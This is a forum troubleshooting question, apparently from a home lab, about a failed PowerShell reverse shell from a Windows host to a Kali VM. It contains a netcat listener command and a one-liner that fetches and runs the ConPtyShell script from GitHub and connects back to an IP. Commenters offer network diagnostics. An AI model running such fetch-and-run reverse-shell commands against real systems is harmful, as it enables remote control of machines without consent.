0

I was trying to spawn a reverse shell to connect to windows computer using netcat. But windows doesn't have ncat installed by default, so I tried to connect to the PowerShell. I specified the port I was listening on. Here is the command I used:

stty raw -echo; (stty size; cat) | nc -lvnp 87

Then I tried to connect to the port on windows:

IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell (IP) 87

But it wasn't detected. After a few seconds it threw me an error message saying:

ConPtyShellException: [-] ConPtyShellException: WSAConnect failed with error code: 10060 at ConPtyShell.connectRemote(String remoteIp, Int32 remotePort) at ConPtyShell.SpawnConPtyShell(String remoteIp, Int32 remotePort, UInt32 rows, UInt32 cols, String commandLine, Boolean upgradeShell) at ConPtyShellMainClass.ConPtyShellMain(String[] args)

Volkov
  • 11
  • 2
  • Add more information. Where\What did you run `stty`/`nc` from, another windows machine? Which device are you expecting to initiate the connection? Verify whether your listener *is* actually listening, using `netstat` for example. If it is listening, then check whether it was connectable, via nmap or `Test-NetConnection` – Cpt.Whale Apr 29 '22 at 17:16
  • More information: I'm using a kali linux virtual box on my windows computer. I wanted to connect to my windows PowerShell since it's already installed unlike netcat. So first thing I did was set up a listener on port 87 and I did so by using by the first command that I posted (stty raw -echo; (stty size; cat) | nc -lvnp 87). Second step was running the second command (IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell (IP) 87). The rest is what I already said above. Thx @Cpt.Whale I will try tommorow. – Volkov Apr 29 '22 at 22:11
  • I used netstat command to check if my listener is listening and it is. I tried to initiate connection and it didn't work. I was using this cheat sheet: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md (The commands I was using are at the bottom of the page) – Volkov May 01 '22 at 10:21
  • To continue with the obvious, can you ping from VM>Host and in reverse? Can you connect to the port (past host firewall etc) with `Test-NetConnection $ip -Port 87`? The error 10060 in the question is just a connection timed out message, so probably more network-related than anything. – Cpt.Whale May 02 '22 at 15:42

0 Answers0